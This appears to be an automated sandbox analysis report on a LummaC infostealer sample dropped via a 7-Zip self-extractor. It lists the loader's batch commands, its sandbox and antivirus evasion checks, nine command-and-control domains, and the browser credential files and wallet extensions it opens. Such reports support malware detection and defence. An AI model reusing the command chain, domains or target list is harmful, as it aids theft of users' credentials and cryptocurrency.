Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041A84C push ecx; ret	0_2_0041A85C
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041ACD6 push ecx; ret	0_2_0041ACE9
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041A774 push eax; ret	0_2_0041A792
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_3_05AE9048 push ecx; retf	12_3_05AE904A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00870DC6 push ecx; ret	12_2_00870DD9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Jump to dropped file

Source: C:\Users\user\Desktop\80441fcf.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Cookbook			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif			Jump to dropped file

Source: C:\Users\user\Desktop\80441fcf.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Cookbook

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008E23FC IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		12_2_008E23FC
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0086F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,		12_2_0086F64C

Source: C:\Users\user\Desktop\80441fcf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_12-103895

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

System information queried: FirmwareTableInformation

Jump to behavior

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Source: C:\Users\user\Desktop\80441fcf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Cookbook

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

API coverage: 4.5 %

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif TID: 5264	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif TID: 2968	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0040325A FindFirstFileW,FindClose,SetLastError,CompareFileTime,	0_2_0040325A
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00402B9F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,	0_2_00402B9F
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00402CB4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	0_2_00402CB4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008BE1AC GetFileAttributesW,FindFirstFileW,FindClose,	12_2_008BE1AC
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008BD98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_008BD98E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008CA29A FindFirstFileW,Sleep,FindNextFileW,FindClose,	12_2_008CA29A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C6406 FindFirstFileW,FindNextFileW,FindClose,	12_2_008C6406
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0088C5F3 FindFirstFileExW,	12_2_0088C5F3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C70FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_008C70FE
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C705D FindFirstFileW,FindClose,	12_2_008C705D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008BD65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_008BD65B
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C9DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_008C9DB1

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_00854E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

12_2_00854E68

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Cookbook	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Increasingly	Jump to behavior

Source: Apply.pif, 0000000C.00000002.2541325415.0000000003B0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Apply.pif, 0000000C.00000003.2482088449.0000000004B2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Apply.pif, 0000000C.00000003.2482088449.0000000004B2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008CF229 BlockInput,

12_2_008CF229

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: 0_2_0041AF8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041AF8A

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_00854E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

12_2_00854E68

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_00875038 mov eax, dword ptr fs:[00000030h]

12_2_00875038

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008B1244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

12_2_008B1244

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041B0EF SetUnhandledExceptionFilter,	0_2_0041B0EF
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041B2A5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041B2A5
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041AF8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041AF8A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008828E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_008828E2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00870B8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00870B8F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00870D25 SetUnhandledExceptionFilter,	12_2_00870D25
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00870F71 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00870F71

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: associationokeo.shop
Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: turkeyunlikelyofw.shop
Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pooreveningfuseor.pw
Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: edurestunningcrackyow.fun
Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: detectordiscusser.shop
Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: problemregardybuiwo.fun
Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: lighterepisodeheighte.fun
Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: technologyenterdo.shop
Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: assumptionflattyou.shop

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

12_2_008B18E3

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: 0_2_00401B98 ShellExecuteExW,WaitForSingleObject,CloseHandle,

0_2_00401B98

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_0086F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,

12_2_0086F64C

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008BE996 mouse_event,

12_2_008BE996

Source: C:\Users\user\Desktop\80441fcf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 5758	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Ink 5758\o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif 5758\Apply.pif 5758\o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

12_2_008B1244

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008B1D45 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

12_2_008B1D45

Source: Apply.pif	Binary or memory string: Shell_TrayWnd
Source: 80441fcf.exe, 00000000.00000003.2163056937.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Apply.pif, 0000000C.00000000.2190256797.00000000008ED000.00000002.00000001.01000000.00000005.sdmp, Apply.pif, 0000000C.00000003.2426382536.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: 0_2_0041AAAF cpuid

0_2_0041AAAF

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,GetEnvironmentVariableW,GetLastError,lstrcmpiW,SetLastError,lstrlenA,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_004030A0

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: 0_2_00402648 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,

0_2_00402648

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008AE514 GetUserNameW,

12_2_008AE514

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_0088BCA2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

12_2_0088BCA2

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_00854E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

12_2_00854E68

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Apply.pif PID: 6488, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Apply.pif, 0000000C.00000002.2541623497.0000000003CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Apply.pif, 0000000C.00000003.2483458637.0000000004A73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Edge/Default/Extensions/ExodusWeb3
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 80441fcf.exe, 00000000.00000003.2163056937.00000000027A7000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: $airplanespringfieldnice = 'withdrawalarkansascheckinghockeystoredossayingregionchesterappreciationpaymenttaughtdishes'

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\Application Data\Mozilla\Firefox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
